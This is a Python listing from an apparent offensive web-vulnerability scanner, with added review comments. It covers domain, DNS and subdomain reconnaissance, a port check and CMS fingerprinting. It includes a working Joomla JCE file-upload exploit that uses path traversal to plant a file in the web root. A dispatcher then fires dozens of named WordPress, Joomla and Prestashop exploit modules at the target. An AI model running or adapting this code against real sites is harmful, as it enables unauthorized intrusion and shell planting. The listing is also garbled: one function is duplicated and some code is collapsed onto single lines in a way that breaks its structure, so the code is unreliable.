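def web_host(self):
    """Print domain-age and IP hosting details for ``self.url``.

    Queries the payapi.io domain-age endpoint, resolves the host name with
    ``socket.gethostbyname`` and fetches the ipinfo.io JSON record for the
    resulting address.  Exceptions raised inside the lookup section are
    printed as a ``Parse Error`` line instead of propagating.
    """
    request_timeout = 10  # seconds; a stalled third-party API must not hang the run
    host = hostd(self.url)
    urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + host
    # Pass headers by keyword: the second positional parameter of
    # requests.get() is ``params``, which would place the header values in the
    # query string of a third-party request instead of sending them as headers.
    getinfo = requests.get(
        urldate, headers=self.headers, timeout=request_timeout).text
    matches = re.search(r'Date: (.+?)-(.+?)', getinfo)
    try:
        # NOTE(review): the IP lookup is kept under the domain-age match, which
        # is how the collapsed listing reads -- confirm against the real file.
        if matches:
            print(' {0} Domain Created on : {1}'.format(
                good, matches.group(1)))
            ip = socket.gethostbyname(host)
            # NOTE(review): this is simply the resolved address; nothing here
            # checks that it belongs to Cloudflare despite the label.
            print(' {0} CloudFlare IP : {1}'.format(good, ip))
            # HTTPS so the address under investigation and the returned record
            # do not cross the network in clear text.
            ipinfo = "https://ipinfo.io/" + ip + "/json"
            gather = requests.get(
                ipinfo, headers=self.headers, timeout=request_timeout).text
            # (label, pattern) pairs pulled out of the raw JSON text.
            fields = (
                ('Country', r'country\": \"(.+?)\"'),
                ('Region', r'region\": \"(.+?)\"'),
                ('Timezone', r'timezone\": \"(.+?)\"'),
                ('Postal', r'postal\": \"(.+?)\"'),
                ('Org', r'org\": \"(.+?)\"'),
                ('Location', r'loc\": \"(.+?)\"'),
            )
            for label, pattern in fields:
                self.match_printer(label, self.match_info(pattern, gather))
    except Exception as err:
        # Best-effort reporting: any failure above ends the section with a
        # single error line.
        print(' {0} Parse Error : {1}'.format(bad, err))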
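def domain_info(url):
    """Print the host (sub-domain) records DNSDumpster returns for *url*.

    Loads the DNSDumpster landing page to read its CSRF token, submits the
    domain through the search form and prints every row of the fourth result
    table.  Returns ``None``.  When the token or the table is missing a short
    notice is printed and the function returns early.
    """
    domain = hostd(url)
    dnsdumpster_url = 'https://dnsdumpster.com/'
    request_timeout = 15  # seconds

    # One session, closed on exit, instead of two throwaway sessions.
    with requests.Session() as session:
        landing = session.get(dnsdumpster_url, timeout=request_timeout).text
        token_match = re.search(
            r"name='csrfmiddlewaretoken' value='(.*?)'", landing)
        if token_match is None:
            # The page layout changed or the request was blocked; calling
            # .group() on None would raise AttributeError.
            print(' %s CSRF token not found, skipping' % que)
            return
        csrf_token = token_match.group(1)

        cookies = {'csrftoken': csrf_token}
        headers = {'Referer': 'https://dnsdumpster.com/'}
        data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain}
        response = session.post(dnsdumpster_url, cookies=cookies, data=data,
                                headers=headers, timeout=request_timeout)
    # The map image download was dropped: its response was never used, so it
    # only added a third-party request naming the target domain.

    if response.status_code != 200:
        return

    soup = BeautifulSoup(response.content, 'html.parser')
    tables = soup.findAll('table')
    if len(tables) < 4:
        print(' %s No host table in response, skipping' % que)
        return

    print(' %s SubDomains' % que)
    for entry in results(tables[3]):
        # Single %-format pass: the record values come from remote HTML and
        # must not be re-interpreted as format directives.
        print(" %s SubDomain : %s \n %s IP : %s \n %s----------------%s"
              % (good, entry['domain'], good, entry['ip'], bannerblue, end))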
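def dnsdumper(url):
    """Print the DNS-server and MX records DNSDumpster returns for *url*.

    Reads the CSRF token from the DNSDumpster landing page, submits the domain
    through the search form and prints the rows of the first (DNS servers) and
    second (MX) result tables.  Returns ``None``.
    """
    domain = hostd(url)
    dnsdumpster_url = 'https://dnsdumpster.com/'
    request_timeout = 15  # seconds

    def _print_records(records):
        # Single %-format pass so remote values are never treated as format
        # directives.
        for entry in records:
            print(" %s Host : %s \n %s IP : %s \n %s AS : %s \n %s----------------%s"
                  % (good, entry['domain'], good, entry['ip'],
                     good, entry['as'], bannerblue, end))

    with requests.Session() as session:
        landing = session.get(dnsdumpster_url, timeout=request_timeout).text
        token_match = re.search(
            r"name='csrfmiddlewaretoken' value='(.*?)'", landing)
        if token_match is None:
            # Without a token the form post cannot succeed; stop here instead
            # of submitting the literal value None.
            print(' %s CSRF token not found, skipping DNS dump' % info)
            return
        csrf_token = token_match.group(1)
        print(' %s Retrieved token: %s' % (info, csrf_token))

        cookies = {'csrftoken': csrf_token}
        headers = {'Referer': 'https://dnsdumpster.com/'}
        data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain}
        response = session.post(dnsdumpster_url, cookies=cookies, data=data,
                                headers=headers, timeout=request_timeout)
    # The map image download was dropped: its response was never used.

    if response.status_code != 200:
        return

    soup = BeautifulSoup(response.content, 'html.parser')
    tables = soup.findAll('table')
    if len(tables) < 2:
        print(' %s No record tables in response, skipping DNS dump' % info)
        return

    print(' %s Search for DNS Servers' % que)
    _print_records(results(tables[0]))
    print(' %s Search for MX Records ' % que)
    _print_records(results(tables[1]))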
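def portscan(self):
    """Report whether ``self.port`` accepts a TCP connection on the target.

    Does nothing when ``self.port`` is falsy.  Otherwise attempts one TCP
    connect to the host derived from ``self.url`` and prints the port, its
    open/closed marker and the ``portsobject`` entry for that port.
    """
    if not self.port:
        # No socket is allocated when there is nothing to check.
        return
    # The context manager closes the descriptor even if the lookup or the
    # connect raises; a bare socket.socket() is otherwise left open.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        result = sock.connect_ex((hostd(self.url), self.port))
    # connect_ex() returns 0 on success and an errno value otherwise.
    state = portopen if result == 0 else portclose
    print(' {} {} {} {}'.format(
        que, self.port, state, portsobject[self.port]))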
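def dnsdumper(url):
    """Print the DNS-server and MX records DNSDumpster returns for *url*.

    Reads the CSRF token from the hidden ``csrfmiddlewaretoken`` input on the
    DNSDumpster landing page, submits the domain through the search form and
    prints the rows of the first (DNS servers) and second (MX) result tables.
    Returns ``None``.
    """
    domain = hostd(url)
    dnsdumpster_url = 'https://dnsdumpster.com/'
    request_timeout = 15  # seconds

    def _print_records(records):
        # Single %-format pass so remote values are never treated as format
        # directives.
        for entry in records:
            print(" %s Host : %s \n %s IP : %s \n %s AS : %s \n %s----------------%s"
                  % (good, entry['domain'], good, entry['ip'],
                     good, entry['as'], bannerblue, end))

    # Certificate verification stays at the requests default (enabled):
    # verify=False would let anyone on the network path read or rewrite the
    # token, the submitted domain and the returned records.
    with requests.Session() as session:
        landing = session.get(dnsdumpster_url, timeout=request_timeout)
        token_input = BeautifulSoup(landing.text, 'html.parser').find(
            'input', attrs={'name': 'csrfmiddlewaretoken'})
        csrf_token = token_input.get('value') if token_input else None
        if not csrf_token:
            # A missing input used to surface as IndexError, which an
            # `except AttributeError` handler does not catch.
            print(' %s CSRF token not found, skipping DNS dump' % info)
            return
        print(' %s Retrieved token: %s' % (info, csrf_token))

        cookies = {'csrftoken': csrf_token}
        headers = {'Referer': 'https://dnsdumpster.com/'}
        data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain}
        response = session.post(dnsdumpster_url, cookies=cookies, data=data,
                                headers=headers, timeout=request_timeout)
    # The map image download was dropped: its response was never used.

    if response.status_code != 200:
        return

    soup = BeautifulSoup(response.content, 'html.parser')
    tables = soup.findAll('table')
    if len(tables) < 2:
        print(' %s No record tables in response, skipping DNS dump' % info)
        return

    print(' %s Search for DNS Servers' % que)
    _print_records(results(tables[0]))
    print(' %s Search for MX Records ' % que)
    _print_records(results(tables[1]))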
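def webhosting_info(hostinfo):
    """Print domain-age and IP hosting details for the module-level ``url``.

    *hostinfo* is accepted for interface compatibility but is not read; the
    target and request headers come from the enclosing scope's ``url`` and
    ``headers``.  Failures in the IP section are reported with one error line.
    """
    request_timeout = 10  # seconds
    print (' %s Web Hosting Information' % (run))
    host = hostd(url)
    urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + host
    # Pass headers by keyword: the second positional parameter of
    # requests.get() is ``params``, which would leak the header values into
    # the query string of a third-party request.
    getinfo = requests.get(
        urldate, headers=headers, timeout=request_timeout).text
    matches = re.search(r'Date: (.+?)-(.+?)', getinfo)
    if matches:
        print ( ' %s Domain Created on : %s' % (good,matches.group(1)))
    try:
        ip = socket.gethostbyname(host)
        # NOTE(review): this is simply the resolved address; nothing here
        # checks that it belongs to Cloudflare despite the label.
        print ( ' %s CloudFlare IP : %s' % (good,ip))
        # HTTPS so the address and the returned record are not sent in clear.
        ipinfo = "https://ipinfo.io/" + ip + "/json"
        getipinfo = requests.get(
            ipinfo, headers=headers, timeout=request_timeout).text
        # (output template, pattern) pairs, printed in this order.
        # NOTE(review): the latitude pattern ends in a lazy group, so it can
        # capture one character at most, and latitude/longitude/ans may not be
        # keys the service returns at all -- verify against a live response.
        fields = (
            (' %s Country : %s', r'country\": \"(.+?)\"'),
            (' %s Region : %s', r'region\": \"(.+?)\"'),
            (' %s Latitude : %s', r'latitude: (.+?)'),
            (' %s Longitude : %s', r'longitude\": \"(.+?)\"'),
            (' %s Timezone : %s', r'timezone\": \"(.+?)\"'),
            (' %s Ans : %s', r'ans\": \"(.+?)\"'),
            (' %s Org : %s', r'org\": \"(.+?)\"'),
        )
        for template, pattern in fields:
            found = re.search(pattern, getipinfo)
            if found:
                print(template % (good, found.group(1)))
        print ("-----------------------------------------------")
    except Exception:
        # Best-effort section: resolution or lookup failures end it quietly.
        print(' %s Error to get ip for this web ' % (bad))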
# joomla_comjce(url, headers, timeout)
# Upload check against the Joomla JCE image-manager form handler.
#   1. Overwrites headers['User-Agent'] in the dict supplied by the caller
#      (the caller's object is mutated, not a copy).
#   2. Sends ./shell/VulnX.gif through vxpost() (defined elsewhere) to the
#      com_jce imgmanager "method=form" endpoint, with 'upload-dir' set to
#      './../../' and 'upload-overwrite' set to 0.
#   3. Requests <url>/VulnX.gif and prints the success marker when the body
#      contains the literal text '/image/gif/', otherwise the failure marker.
# NOTE(review): `host` and `content` are assigned but never read; the handle
# returned by open() is never closed; requests.get(path_shell, headers) passes
# `headers` as the positional `params` argument, so the values travel in the
# query string rather than as request headers.
# Defender view: the pair "POST index.php?option=com_jce ... method=form"
# followed by a GET for a new image in the web root is distinctive in access
# logs.  Keeping the JCE component patched and refusing uploads that resolve
# outside the configured media directory removes the exposure.
def joomla_comjce(url, headers, timeout): host = hostd(url) headers[ 'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' endpoint = url + "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20" data = { 'upload-dir': './../../', 'upload-overwrite': 0, 'Filedata': [open('./shell/VulnX.gif', 'rb')], 'action': 'Upload', } content = vxpost(endpoint, data, headers, timeout) path_shell = url + "/VulnX.gif" res = requests.get(path_shell, headers).text matches = re.findall(re.compile(r'/image/gif/'), res) if matches: print(' %s Com Jce %s %s' % (que, vulnexploit, path_shell)) else: print(' %s Com Jce %s' % (que, failexploit))
# detect_cms()
# Fingerprints the CMS behind the module-level `url` and then runs whichever
# follow-up modules the module-level option flags select.
#   * Three requests are made up front: <url>/smiley/1.gif, <url>/rss.xml and
#     <url> itself.
#   * Classification is an if/elif chain of regex searches over the response
#     bodies, in this order: Joomla, Wordpress, Drupal, Prestashop, OpenCart,
#     Magento, Lokomedia (two branches), otherwise "Unknown".
#   * Names read from the enclosing scope (not defined in this listing):
#     url, headers, timeout, webinfo, hostinfo, domaininfo, subdomains, cms,
#     scanports, dnsdump, exploit, grabinfo, vulnresults and the colour markers.
#   * The Drupal, OpenCart and Magento `exploit` branches only print the table
#     header; the Lokomedia and Unknown branches have no `exploit` branch.
# NOTE(review): requests.get(x, headers) passes `headers` as the positional
# `params` argument, so the values are sent in the query string; none of the
# requests sets a timeout.
# NOTE(review): signatures such as 'Joomla!', 'wordpress', 'drupal' or
# 'Magento' are plain substrings of the page body, so a page that merely
# mentions a product is classified as running it.
# NOTE(review): the Lokomedia branches test `subdomains` where every other
# branch tests `domaininfo` -- confirm which flag is intended.
# NOTE(review): this listing has lost its line breaks, so branch nesting cannot
# be confirmed from here; restore the original layout before relying on it.
# Defender view: /smiley/1.gif and /rss.xml being requested ahead of the site
# root by one client is a usable correlation point in access logs.
def detect_cms(): lm = url + '/smiley/1.gif' lm_content = requests.get(lm,headers).text lm2 = url + '/rss.xml' lm2_content = requests.get(lm2,headers).text content=requests.get(url,headers).text # try: ############################ # # # joomla # # # ############################ #joomla searching content to detect. if re.search(re.compile(r'<script type=\"text/javascript\" src=\"/media/system/js/mootools.js\"></script>|/media/system/js/|com_content|Joomla!'), content): print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s %sCMS :%s Joomla' % (good,W,end)) print ('------------------------------------------------') #webinfo gathering argument if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) if cms == 'version': print (' %s CMS informations gathering' %(run)) joo_version(url,headers) print ("-----------------------------------------------") if cms == 'all': print (' %s CMS informations gathering' %(run)) joo_version(url,headers) joo_user(url,headers) joo_template(url,headers) print ("-----------------------------------------------") #port to scan if scanports: print (' %s Scanning Ports' %(run)) print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) portscan(hostd(url)) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump' %(run)) dnsdumper(url) print ("-----------------------------------------------") #joomla_exploits imported from folder[./common/joomla_exploits.py] if exploit: print (' %s Check Vulnerability' %(run)) print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) joomla_comjce(url,headers,timeout) joomla_comedia(url,headers,timeout) joomla_comjdownloads(url,headers,timeout) joomla_comjdownloads2(url,headers,timeout) joomla_fabrik2(url,headers,timeout) joomla_fabrik2_d(url,headers,timeout) 
joomla_foxcontact(url,headers,timeout) ############################ # # # Wordpress # # # ############################ #wordpress searching content to detect. elif re.search(re.compile(r'wp-content|wordpress|xmlrpc.php'), content): print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s %sCMS :%s Wordpress' % (good,W,end)) print ('------------------------------------------------') if webinfo: webhosting_info(hostinfo) if domaininfo: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) #wp_grab methods info from (folder)[./common/grapwp.py] if cms == 'version': print (' %s CMS informations gathering' %(run)) wp_version(url,headers,grabinfo) print ("-----------------------------------------------") if cms == 'themes': print (' %s CMS informations gathering' %(run)) wp_themes(url,headers,grabinfo) print ("-----------------------------------------------") if cms == 'user': print (' %s CMS informations gathering' %(run)) wp_user(url,headers,grabinfo) print ("-----------------------------------------------") if cms == 'plugins': print (' %s CMS informations gathering' %(run)) wp_plugin(url,headers,grabinfo) print ("-----------------------------------------------") if cms == 'all': print (' %s CMS informations gathering' %(run)) wp_version(url,headers,grabinfo) wp_themes(url,headers,grabinfo) wp_user(url,headers,grabinfo) wp_plugin(url,headers,grabinfo) print ("-----------------------------------------------") #port to scan if scanports: print (' %s Scanning Ports' %(run)) print (""" %sPORTS %sSTATUS %sPROTO"""%(W,W,W)) portscan(hostd(url)) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump' %(run)) dnsdumper(url) print ("-----------------------------------------------") # vulnx -u http://example.com -e | vulnx -u http://example --exploit if exploit: print (' %s Check 
Vulnerability\n' %(run)) print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) #wp_exploit methods from (dolder)[./common/wp_exploits.py] wp_wysija(url,headers,vulnresults) wp_blaze(url,headers,vulnresults) wp_synoptic(url,headers,vulnresults) wp_catpro(url,headers,vulnresults) wp_cherry(url,headers,vulnresults) wp_dm(url,headers,vulnresults) wp_fromcraft(url,headers,vulnresults) wp_jobmanager(url,headers,vulnresults) wp_showbiz(url,headers,vulnresults) wp_shop(url,headers,vulnresults) wp_powerzoomer(url,headers,vulnresults) wp_revslider(url,headers,vulnresults) wp_adsmanager(url,headers,vulnresults) wp_inboundiomarketing(url,headers,vulnresults) wp_adblockblocker(url,headers,vulnresults) wp_levoslideshow(url,headers,vulnresults) print ("-----------------------------------------------") ############################ # # # Drupal # # # ############################ #drupal searching content to detect. elif re.search(re.compile(r'Drupal|drupal|sites/all|drupal.org'), content): print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s CMS : Drupal' % (good)) print ('------------------------------------------------') if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) if cms == 'version': print (' %s CMS informations gathering' %(run)) drupal_version() if scanports: print (' %s Scanning Ports\n' %(run)) print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) portscan(hostd(url)) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump ' %(run)) dnsdumper(url) print ("-----------------------------------------------") if exploit: print (' %s Check Vulnerability\n' %(run)) print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) ############################ # # # Prestashop # # # ############################ #prestashop 
searching content to detect. elif re.search(re.compile(r'Prestashop|prestashop'), content): print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s %sCMS :%s Prestashop' % (good,W,end)) print ('------------------------------------------------') if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) if cms == 'version': print (' %s CMS informations gathering' %(run)) prestashop_version() if scanports: print (' %s Scanning Ports\n' %(run)) print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) portscan(hostd(url)) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump ' %(run)) dnsdumper(url) print ("-----------------------------------------------") if exploit: print (' %s Check Vulnerability\n' %(run)) print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) columnadverts(url,headers) soopabanners(url,headers) vtslide(url,headers) simpleslideshow(url,headers) productpageadverts(url,headers) productpageadvertsb(url,headers) jro_homepageadvertise(url,headers) attributewizardpro(url,headers) oneattributewizardpro(url,headers) attributewizardpro_old(url,headers) attributewizardpro_x(url,headers) advancedslider(url,headers) cartabandonmentpro(url,headers) cartabandonmentpro_old(url,headers) videostab(url,headers) wg24themeadministration(url,headers) fieldvmegamenu(url,headers) wdoptionpanel(url,headers) pk_flexmenu(url,headers) nvn_export_orders(url,headers) tdpsthemeoptionpanel(url,headers) masseditproduct(url,headers) ############################ # # # OpenCart # # # ############################ #opencart searching content to detect. 
elif re.search(re.compile(r'route=product|OpenCart|route=common|catalog/view/theme'), content): print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s CMS : OpenCart' % (good)) print ('------------------------------------------------') if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) if cms == 'version': print (' %s CMS informations gathering' %(run)) if scanports: print (' %s Scanning Ports\n' %(run)) print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) portscan(hostd(url)) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump ' %(run)) dnsdumper(url) print ("-----------------------------------------------") if exploit: print (' %s Check Vulnerability\n' %(run)) print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) ############################ # # # Magento # # # ############################ #magento searching content to detect. 
elif re.search(re.compile(r'Log into Magento Admin Page|name=\"dummy\" id=\"dummy\"|Magento'), content): print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s CMS : Magento' % (good)) print ('------------------------------------------------') if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) if cms == 'version': print (' %s CMS informations gathering' %(run)) if scanports: print (' %s Scanning Ports\n' %(run)) print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) portscan(hostd(url)) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump ' %(run)) dnsdumper(url) print ("-----------------------------------------------") if exploit: print (' %s Check Vulnerability' %(run)) print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) ############################ # # # Lokomedia # # # ############################ #lokomedia searching content to detect. 
print (' %s Check Vulnerability' %(run)) elif re.search(re.compile(r'image/gif'), lm_content): print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s CMS : Lokomedia' % (good)) print ('------------------------------------------------') if subdomains: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) print ('------------------------------------------------') if scanports: print (' %s Scanning Ports\n' %(run)) print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) portscan(hostd(url)) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump ' %(run)) dnsdumper(url) print ("-----------------------------------------------") print (' %s Check Vulnerability' %(run)) elif re.search(re.compile(r'lokomedia'), lm2_content): print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s CMS : Lokomedia' % (good)) print ('------------------------------------------------') if subdomains: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) if scanports: print (' %s Scanning Ports\n' %(run)) print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) portscan(hostd(url)) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump ' %(run)) dnsdumper(url) print ("-----------------------------------------------") print (' %s Check Vulnerability' %(run)) ############################ # # # Unknown # # # ############################ #no cms detect else: print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) print ('------------------------------------------------') print (' %s looking for cms' % (que)) print (' %s CMS : Unknown' % (bad)) print 
('------------------------------------------------') if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: print (' %s Starting searching for Subdomains' %(run)) domain_info(url) print ("-----------------------------------------------") if dnsdump: print (' %s Starting DNS dump ' %(run)) dnsdumper(url) print ("-----------------------------------------------")